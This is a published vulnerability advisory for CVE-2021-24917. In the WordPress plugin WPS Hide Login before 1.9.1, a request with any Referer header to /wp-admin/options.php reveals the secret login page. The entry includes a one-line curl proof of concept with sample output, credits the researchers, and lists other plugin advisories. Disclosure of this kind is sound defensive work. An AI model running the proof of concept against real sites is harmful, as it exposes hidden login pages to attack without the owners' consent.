WPS Hide Login < 1.9.1 – Protection Bypass with Referer-Header | CVE 2021-24917 | Plugin Vulnerabilities

Description

The plugin has a bug which allows to get the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.

Proof of Concept

curl --referer "something" -sIXGET https://example.com/wp-admin/options.php
HTTP/2 302 
...
location: https://example.com/secret-login/?redirect_to=%2Fwp-admin%2Fsomething&reauth=1

Affects Plugins

Fixed in 1.9.1

References

CVE

URL

https://wordpress.org/support/topic/bypass-security-issue/

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf, Thalakus

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

15bb711a-7d70-4891-b7a2-c473e3e8b375

Timeline

Publicly Published

2021-10-27 (about 4 years ago)

Added

2021-11-02 (about 4 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2024-04-05

Title

PostX – Gutenberg Blocks for Post Grid < 3.2.4 - Incorrect Authorization

Published

2025-02-11

Title

WP Booking Calendar < 10.10.1 - Unauthenticated Post-Confirmation Booking Manipulation

Published

2024-06-20

Title

WishList Member X < 3.26.7 - Subscriber+ Privilege Escalation

Published

2019-02-26

Title

Freemius Library < 2.2.4 - Subscriber+ Arbitrary Option Update

Published

2025-04-24

Title

Prevent Direct Access 2.8.6 - 2.8.8.2 - Incorrect Authorization to Authenticated (Contributor+) Multiple Media Actions